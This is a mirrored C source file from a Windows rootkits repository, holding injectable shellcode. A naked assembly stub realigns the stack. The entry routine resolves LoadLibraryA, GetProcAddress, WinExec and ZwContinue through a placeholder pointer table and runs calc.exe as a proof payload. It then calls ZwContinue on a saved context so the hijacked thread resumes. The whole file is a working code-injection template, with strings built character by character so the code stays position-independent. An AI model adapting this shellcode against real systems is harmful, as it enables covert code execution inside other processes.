mirror of
https://github.com/ciyze0101/Windows-Rootkits
synced 2024-06-28 17:50:52 +00:00
95 lines
2.0 KiB
C
95 lines
2.0 KiB
C
typedef void * (__stdcall *pfnLoadLibraryA)(void *lpLibFileName);
|
|
typedef void * (__stdcall *pfnGetProcAddress)(void * hModule, void * lpProcName);
|
|
typedef int(__stdcall *pfnWinExec)(void * lpCmdLine, unsigned int uCmdShow);
|
|
typedef int(__stdcall *pfnZwContinue)(void * lpContext, int TestAlert);
|
|
|
|
typedef struct _FUNCTIONPOINTERS
|
|
{
|
|
pfnLoadLibraryA pfnLoadLibraryA;
|
|
pfnGetProcAddress pfnGetProcAddress;
|
|
} FUNCTIONPOINTERS, *PFUNCTIONPOINTERS;
|
|
|
|
FUNCTIONPOINTERS g_FunctionPointers;
|
|
|
|
void shellcode_entry();
|
|
|
|
__declspec(naked) void fix_esp()
|
|
{
|
|
__asm{
|
|
mov eax, edi;
|
|
add ax, 0xc4;
|
|
mov esp, [eax];
|
|
sub sp, 0x1024;
|
|
// This is needed for alignment purposes
|
|
nop;
|
|
nop;
|
|
nop;
|
|
}
|
|
|
|
}
|
|
|
|
void shellcode_entry()
|
|
{
|
|
PFUNCTIONPOINTERS ptFunctionPointer = 0x13371337;
|
|
pfnWinExec pfnWinExec;
|
|
pfnZwContinue pfnZwContinue;
|
|
void * ptContext;
|
|
void * hKernel32;
|
|
void * hNtDll;
|
|
char pszKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' };
|
|
char pszNtDll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', '\0' };
|
|
char pszZwContinue[] = { 'Z','w','C','o','n','t','i','n','u','e', '\0'};
|
|
char pszWinExec[] = { 'W', 'i', 'n', 'E', 'x', 'e', 'c', '\0' };
|
|
char pszCalcExe[] = { 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', '\0' };
|
|
|
|
__asm{
|
|
mov[ptContext], edi;
|
|
}
|
|
|
|
hKernel32 = ptFunctionPointer->pfnLoadLibraryA(pszKernel32);
|
|
if (0 == hKernel32)
|
|
{
|
|
goto lblCleanup;
|
|
}
|
|
|
|
hNtDll = ptFunctionPointer->pfnLoadLibraryA(pszNtDll);
|
|
if (0 == hNtDll)
|
|
{
|
|
goto lblCleanup;
|
|
}
|
|
|
|
pfnZwContinue = ptFunctionPointer->pfnGetProcAddress(hNtDll, pszZwContinue);
|
|
if (0 == pfnZwContinue)
|
|
{
|
|
goto lblCleanup;
|
|
}
|
|
|
|
pfnWinExec = ptFunctionPointer->pfnGetProcAddress(hKernel32, pszWinExec);
|
|
if (0 == pfnWinExec)
|
|
{
|
|
goto lblCleanup;
|
|
}
|
|
|
|
pfnWinExec(pszCalcExe, 0);
|
|
|
|
pfnZwContinue(ptContext, 1);
|
|
|
|
lblCleanup:
|
|
return;
|
|
}
|
|
|
|
void dummy()
|
|
{
|
|
int dummy = 0xDEADBABE;
|
|
}
|
|
|
|
#include <Windows.h>
|
|
|
|
int main()
|
|
{
|
|
g_FunctionPointers.pfnGetProcAddress = GetProcAddress;
|
|
g_FunctionPointers.pfnLoadLibraryA = LoadLibraryA;
|
|
fix_esp();
|
|
shellcode_entry();
|
|
dummy();
|
|
} |